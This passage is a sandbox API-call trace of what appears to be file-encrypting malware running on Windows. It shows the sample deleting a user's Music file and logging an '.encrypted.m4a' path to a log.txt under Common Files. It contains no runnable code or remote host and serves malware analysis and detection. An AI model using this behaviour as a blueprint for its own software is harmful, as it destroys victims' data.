Flags=0x0, Size=0x4) returned 0x7da1d8 [0038.245] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0038.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa) returned 0x88c7a8 [0038.245] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x88c7a8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0038.245] FreeLibrary (hLibModule=0x76e10000) returned 1 [0038.245] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0038.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0038.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0038.246] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0038.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0038.246] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0038.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0038.246] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0038.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0038.246] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0038.246] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0038.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0038.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0038.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0038.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0038.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0038.246] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0038.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af538 [0038.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0038.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0038.246] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0038.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0038.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0038.247] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0038.247] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889730 [0038.247] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x889730, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0038.247] FreeLibrary (hLibModule=0x76e10000) returned 1 [0038.247] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.247] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0038.247] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0038.247] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0038.247] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.247] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0038.247] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0038.247] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.247] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0038.247] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0038.247] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0038.247] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0038.247] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\lWN8-ZQxM7632S6p.m4a", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\lWN8-ZQxM7632S6p.m4a", lpFilePart=0x0) returned 0x38 [0038.247] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\lWN8-ZQxM7632S6p.m4a", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58b23f10, ftCreationTime.dwHighDateTime=0x1d5c162, ftLastAccessTime.dwLowDateTime=0xc7bb7600, ftLastAccessTime.dwHighDateTime=0x1d5b93e, ftLastWriteTime.dwLowDateTime=0x1681b000, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x1ccc, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="lWN8-ZQxM7632S6p.m4a", cAlternateFileName="LWN8-Z~1.M4A")) returned 0x7c2240 [0038.247] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\lWN8-ZQxM7632S6p.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\lwn8-zqxm7632s6p.m4a")) returned 1 [0038.248] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58b23f10, ftCreationTime.dwHighDateTime=0x1d5c162, ftLastAccessTime.dwLowDateTime=0xc7bb7600, ftLastAccessTime.dwHighDateTime=0x1d5b93e, ftLastWriteTime.dwLowDateTime=0x1681b000, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x1ccc, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="lWN8-ZQxM7632S6p.m4a", cAlternateFileName="LWN8-Z~1.M4A")) returned 0 [0038.248] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0038.248] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.248] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0038.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0038.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0038.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0038.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0038.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0038.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0038.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0038.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0038.249] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0038.249] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0038.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0038.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0038.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0038.249] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.249] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.249] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.249] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0038.249] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0038.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0038.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0038.249] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0038.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0038.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0038.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0038.249] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0038.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0038.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0038.250] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0038.250] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0038.250] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0038.250] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0038.250] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0038.250] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0038.250] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0038.250] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0038.250] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0038.250] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0038.250] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0038.250] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0038.250] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab0010 [0038.250] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0038.250] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0038.250] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0038.250] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x24d9, lpOverlapped=0x0) returned 1 [0038.251] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0038.251] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x24d9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0038.251] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0038.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0038.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab0010 | out: hHeap=0x770000) returned 1 [0038.251] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0038.251] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0038.251] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\lWN8-ZQxM7632S6p.encrypted.m4a\r\n", cchWideChar=69, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 69 [0038.251] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x45) returned 0x88e138 [0038.251] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\lWN8-ZQxM7632S6p.encrypted.m4a\r\n", cchWideChar=69, lpMultiByteStr=0x88e138, cbMultiByte=69, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\lWN8-ZQxM7632S6p.encrypted.m4a\r\n", lpUsedDefaultChar=0x0) returned 69 [0038.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0038.251] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3688 [0038.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e138 | out: hHeap=0x770000) returned 1 [0038.251] WriteFile (in: hFile=0x128, lpBuffer=0x7f3688*, nNumberOfBytesToWrite=0x44, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7f3688*, lpNumberOfBytesWritten=0x6aee3c*=0x44, lpOverlapped=0x0) returned 1 [0038.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0038.252] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0038.252] CloseHandle (hObject=0x128) returned 1 [0038.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0038.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0038.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0038.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0038.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0038.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0038.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0038.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0038.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0038.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0038.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0038.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0038.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0038.253] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0038.253] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0038.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0038.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0038.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0038.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0038.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0038.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0038.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0038.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0038.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0038.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0038.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0038.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0038.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0038.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0038.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0038.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0038.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0038.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0038.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0038.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0038.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0038.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0038.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0038.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0038.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0038.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0038.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0038.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0038.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0038.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0038.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0038.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0038.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0038.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0038.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0038.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0038.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0038.254] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0038.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0038.254] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0038.254] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0038.254] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0038.255] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0038.255] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0038.255] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0038.255] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0038.255] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0038.255] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0038.255] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af3f8 [0038.255] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0038.255] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0038.255] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0038.255] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0038.255] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0038.255] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0038.255] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0038.255] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8899a0 [0038.255] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0038.255] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0038.255] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0038.255] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0038.255] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0038.255] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0038.255] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0038.255] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0038.255] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0038.255] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0038.255] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 